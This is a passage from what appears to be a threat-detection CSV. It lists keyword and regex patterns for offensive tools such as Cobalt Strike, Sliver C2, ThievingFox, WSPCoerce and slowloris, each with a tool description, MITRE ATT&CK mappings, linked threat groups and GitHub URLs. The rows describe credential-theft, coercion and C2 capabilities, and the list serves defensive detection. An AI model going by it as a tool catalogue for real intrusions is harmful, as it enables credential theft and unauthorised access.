Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","59601" "*sleepmask_pivot.x64.o*",".{0,1000}sleepmask_pivot\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - 
Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","59602" "*sleepmask_pivot.x86.o*",".{0,1000}sleepmask_pivot\.x86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","59603" "*slemire/WSPCoerce*",".{0,1000}slemire\/WSPCoerce.{0,1000}","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tool","https://github.com/slemire/WSPCoerce","1","0","N/A","N/A","9","3","235","31","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z","59604" "*sleventyeleven/linuxprivchecker*",".{0,1000}sleventyeleven\/linuxprivchecker.{0,1000}","offensive_tool_keyword","linuxprivchecker","search for common privilege escalation vectors such as world writable files. misconfigurations. clear-text passwords and applicable exploits","T1210.001 - T1082 - T1088 - T1547.001","TA0002 - TA0004 - TA0006 - TA0007 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py","1","1","#linux","N/A","7","10","1645","524","2022-01-31T10:32:08Z","2016-04-19T13:31:46Z","59605" "*SlinkyCat.ps1*",".{0,1000}SlinkyCat\.ps1.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","1","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","59606" "*SlinkyCat-main*",".{0,1000}SlinkyCat\-main.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","1","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","59607" "*slip* --archive-type * --compression * --paths * --file-content 
*",".{0,1000}slip.{0,1000}\s\-\-archive\-type\s.{0,1000}\s\-\-compression\s.{0,1000}\s\-\-paths\s.{0,1000}\s\-\-file\-content\s.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/0xless/slip","1","0","N/A","N/A","10","2","100","4","2025-04-11T18:36:31Z","2022-10-29T15:38:36Z","59608" "*Sliver C2 Session*",".{0,1000}Sliver\sC2\sSession.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59609" "*Sliver Copyright (C) 2022 Bishop Fox*",".{0,1000}Sliver\sCopyright\s\(C\)\s2022\sBishop\sFox.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/gsmith257-cyber/better-sliver","1","0","#content","N/A","10","10","98","10","2024-07-22T12:32:16Z","2023-12-12T02:04:36Z","59610" "*Sliver implant*",".{0,1000}Sliver\simplant.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - 
T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#registry","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59611" "*sliver.service*",".{0,1000}sliver\.service.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59612" "*sliver.sh/install*",".{0,1000}sliver\.sh\/install.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59613" "*sliver/.sliver*",".{0,1000}sliver\/\.sliver.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - 
TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59614" "*sliver:sliver*",".{0,1000}sliver\:sliver.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59615" "*sliver_pcap_parser.py*",".{0,1000}sliver_pcap_parser\.py.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59616" "*sliver-bof-dev-quickstart.md*",".{0,1000}sliver\-bof\-dev\-quickstart\.md.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - 
TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59617" "*sliver-client.exe*",".{0,1000}sliver\-client\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59618" "*sliver-client.log*",".{0,1000}sliver\-client\.log.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","#logfile","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59619" "*sliver-client_linux*",".{0,1000}sliver\-client_linux.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest 
- GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","#linux","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59620" "*sliver-client_macos*",".{0,1000}sliver\-client_macos.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59621" "*sliver-client_windows.exe*",".{0,1000}sliver\-client_windows\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59622" "*sliver-dns*",".{0,1000}sliver\-dns.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59623" "*SliverKeylogger*",".{0,1000}SliverKeylogger.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","N/A","10","10","159","44","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z","59624" "*sliverpb*",".{0,1000}sliverpb.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59625" "*sliverpb.Download*",".{0,1000}sliverpb\.Download.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59626" "*sliverpb.Services*",".{0,1000}sliverpb\.Services.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59627" "*sliverpb.Shell*",".{0,1000}sliverpb\.Shell.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59628" "*sliver-server daemon*",".{0,1000}sliver\-server\sdaemon.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59629" "*sliver-server daemon*",".{0,1000}sliver\-server\sdaemon.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59630" "*sliver-server operator *",".{0,1000}sliver\-server\soperator\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59631" "*sliver-server unpack --force*",".{0,1000}sliver\-server\sunpack\s\-\-force.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59632" "*sliver-server.*",".{0,1000}sliver\-server\..{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59633" "*sliver-server.exe*",".{0,1000}sliver\-server\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59634" "*sliver-server-linux.zip*",".{0,1000}sliver\-server\-linux\.zip.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","1","#linux","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59635" "*sliver-server-macos.zip*",".{0,1000}sliver\-server\-macos\.zip.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59636" "*sliver-server-windows.zip*",".{0,1000}sliver\-server\-windows\.zip.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59637" "*Slowerzs/PPLSystem*","Slowerzs\/PPLSystem","offensive_tool_keyword","PPLSystem","creates a livedump of the machine through NtDebugSystemControl to extract the COM secret and context, to then inject inside this process.","T1003.002","TA0006","N/A","N/A","Credential Access","https://github.com/Slowerzs/PPLSystem","1","1","N/A","N/A","10","2","190","23","2024-05-29T18:33:35Z","2024-05-22T17:48:49Z","59638" "*Slowerzs/ThievingFox*",".{0,1000}Slowerzs\/ThievingFox.{0,1000}","offensive_tool_keyword","ThievingFox","collection of 
post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","1","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","59639" "*slowloris.py*",".{0,1000}slowloris\.py.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59640" "*SluiEOP.ps1*",".{0,1000}SluiEOP\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","59641" 
